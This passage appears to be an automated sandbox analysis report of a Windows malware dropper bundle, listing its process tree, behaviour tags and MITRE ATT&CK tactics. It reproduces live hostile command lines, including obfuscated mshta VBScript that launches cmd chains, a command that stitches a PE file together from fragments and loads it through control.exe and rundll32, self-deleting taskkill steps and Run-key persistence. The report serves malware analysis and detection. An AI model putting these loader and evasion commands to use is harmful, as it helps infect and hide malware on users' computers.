- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Users\Admin\AppData\Roaming\3575431.scr"C:\Users\Admin\AppData\Roaming\3575431.scr" /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:3012 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:764
-
-
-
C:\Users\Admin\AppData\Roaming\6430286.scr"C:\Users\Admin\AppData\Roaming\6430286.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2928
-
-
C:\Users\Admin\AppData\Roaming\2730126.scr"C:\Users\Admin\AppData\Roaming\2730126.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Loads dropped DLL
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun1577c3e159a3e3815.exe" & exit6⤵PID:2564
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1577c3e159a3e3815.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
- Loads dropped DLL
PID:960 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵
- Loads dropped DLL
PID:588 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun159ff1acacf.exeSun159ff1acacf.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun159ff1acacf.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵
- Loads dropped DLL
PID:1492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵
- Loads dropped DLL
PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵
- Loads dropped DLL
PID:1640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵
- Loads dropped DLL
PID:432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun152bea652bd7232.exeSun152bea652bd7232.exe1⤵
- Executes dropped EXE
PID:1328
-
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exeSun158d8ef840.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1348 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )2⤵PID:1168
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"3⤵
- Loads dropped DLL
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2424 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )5⤵PID:2508
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"6⤵PID:2672
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )5⤵PID:2784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I6⤵PID:2852
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "7⤵PID:2900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"7⤵PID:2912
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I7⤵PID:2976
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I8⤵
- Loads dropped DLL
PID:3068 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I9⤵PID:396
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I10⤵PID:1828
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1560 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1560 -s 17282⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun1507db358fce61c0b.exeSun1507db358fce61c0b.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1160
-
C:\Users\Admin\AppData\Local\Temp\E521.exeC:\Users\Admin\AppData\Local\Temp\E521.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
C:\Windows\system32\taskeng.exetaskeng.exe {E355680D-963D-4780-9269-09886BA69FFB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2992
-
C:\Users\Admin\AppData\Roaming\eevtgijC:\Users\Admin\AppData\Roaming\eevtgij2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1124
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9EF99C59-DEEA-4C79-AC5B-822CBDDAA797} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2604
-
C:\Windows\system32\taskeng.exetaskeng.exe {235BB499-33BA-47B2-93BC-D3F120267A63} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:960
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2860
-
-
C:\Users\Admin\AppData\Roaming\eevtgijC:\Users\Admin\AppData\Roaming\eevtgij2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2588
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6B310306-7C83-4A8A-9881-8D238DA0252B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1992
-
C:\Users\Admin\AppData\Roaming\eevtgijC:\Users\Admin\AppData\Roaming\eevtgij2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2428
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1